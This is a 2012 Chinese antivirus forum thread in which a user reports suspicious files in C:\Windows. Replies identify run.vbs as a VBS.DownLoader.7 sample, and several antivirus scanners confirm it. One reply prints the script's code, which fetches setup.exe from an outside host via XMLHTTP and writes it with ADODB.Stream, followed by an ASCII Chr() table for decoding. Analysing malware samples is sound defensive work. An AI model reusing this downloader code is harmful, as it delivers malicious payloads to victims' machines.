机器里发现的三个小东西，纠结中。。。

显示全部楼层 · 发表于 2012-4-3 16:31:04

陈识宇发表于 2012-4-3 14:55
落实一下：是小a扫出来的，还是实时监控报出来的？
每个文件，应该说明全路径
建议发帖到病毒救援区

是发现问题后，用小A手动扫描出来的。实时监控没发现那三个文件。
run.vbs run2.vbs都是在C:\windows\ 的目录下，jackvc.exe是在C:\Windows\System32目录下

不好意思，小弟首次发帖。。一直在论坛里默默地学习，

显示全部楼层 · 发表于 2012-4-3 16:39:23

106215461 发表于 2012-4-3 16:31
是发现问题后，用小A手动扫描出来的。实时监控没发现那三个文件。
run.vbs run2.vbs都是在C:\windows\ ...

如果治标：在原路径新建完全同名的文件夹，即可免疫，使他们不再出来

显示全部楼层 · 发表于 2012-4-3 23:56:43

本帖最后由 ssama 于 2012-4-4 00:07 编辑

run.vbs

Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://www.ch952.com/setup.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)

复制代码

剩下那个自己用chr代码表翻译
Chr("0") 为0的字符
Chr("1")
Chr("2")
Chr("3")
Chr("4")
Chr("5")
Chr("6")
Chr("7") 响铃
Chr("8") 回格
Chr("9") tab(水平制表符)
Chr("10") 换行
Chr("11") tab(垂直制表符)
Chr("12") 换页
Chr("13") 回车 chr(13)&chr(10) 回车和换行的组合
Chr("14")
Chr("15")
Chr("16")
Chr("17")
Chr("18")
Chr("19")
Chr("20")
Chr("21")
Chr("22")
Chr("23")
Chr("24")
Chr("25")
Chr("26") 结束 End
Chr("27") 脱离 Pause break
Chr("28")
Chr("29")
Chr("30")
Chr("31")
Chr("32") 空格 SPACE
Chr("33") !
Chr("34") "
Chr("35") #
Chr("36") $
Chr("37") %
Chr("38") &
Chr("39") ’
Chr("40") (
Chr("41") )
Chr("42") *
Chr("43") +
Chr("44") ,
Chr("45") -
Chr("46") .
Chr("47") /
Chr("48") 0
Chr("49") 1
Chr("50") 2
Chr("51") 3
Chr("52") 4
Chr("53") 5
Chr("54") 6
Chr("55") 7
Chr("56") 8
Chr("57") 9
Chr("58") :
Chr("59") ;
Chr("60") <
Chr("61") =
Chr("62") >
Chr("63") ?
Chr("64") @
Chr("65") A
Chr("66") B
Chr("67") C
Chr("68") D
Chr("69") E
Chr("70") F
Chr("71") G
Chr("72") H
Chr("73") I
Chr("74") J
Chr("75") K
Chr("76") L
Chr("77") M
Chr("78") N
Chr("79") O
Chr("80") P
Chr("81") Q
Chr("82") R
Chr("83") S
Chr("84") T
Chr("85") U
Chr("86") V
Chr("87") W
Chr("88") X
Chr("89") Y
Chr("90") Z
Chr("91") [
Chr("92") \
Chr("92") \
Chr("93") ]
Chr("94") ^
Chr("95") _
Chr("96") `
Chr("97") a
Chr("98") b
Chr("99") c
Chr("100") d
Chr("101") e
Chr("102") f
Chr("103") g
Chr("104") h
Chr("105") i
Chr("106") j
Chr("107") k
Chr("108") l
Chr("109") m
Chr("110") n
Chr("111") o
Chr("112") p
Chr("113") q
Chr("114") r
Chr("115") s
Chr("116") t
Chr("117") u
Chr("118") v
Chr("119") w
Chr("120") x
Chr("121") y
Chr("122") z
Chr("123") {
Chr("124") |
Chr("125") }
Chr("126") ~
Chr("127")
Chr("128")
Chr("129")
Chr("130")
Chr("131")
Chr("132")

显示全部楼层 · 发表于 2012-4-4 08:06:09

原因：侦测到威胁 (VBS.DownLoader.7)
日期：㈠　12/4/4 8:06

显示全部楼层 · 发表于 2012-4-4 08:50:20

Avast 以经检测到危害

显示全部楼层 · 发表于 2012-4-4 09:02:35

支持

显示全部楼层 · 发表于 2012-4-4 09:06:30

360 KILL~

显示全部楼层 · 发表于 2012-4-4 09:24:30

chr()
将ASCI编码转换为文字

显示全部楼层 · 发表于 2012-4-4 11:07:08

run.rar 0.80/0.80KB 100.00% 在线扫描它是一个“脚本病毒” 2012/4/4 11:06:40 2012/4/4 11:06:54

显示全部楼层 · 发表于 2012-4-4 20:40:09

大蜘蛛发现1个：
run.vbs infected with VBS.DownLoader.7
另一个Clean：
run2.vbs - Ok
已上报！

[病毒样本] 机器里发现的三个小东西，纠结中。。。

本帖子中包含更多资源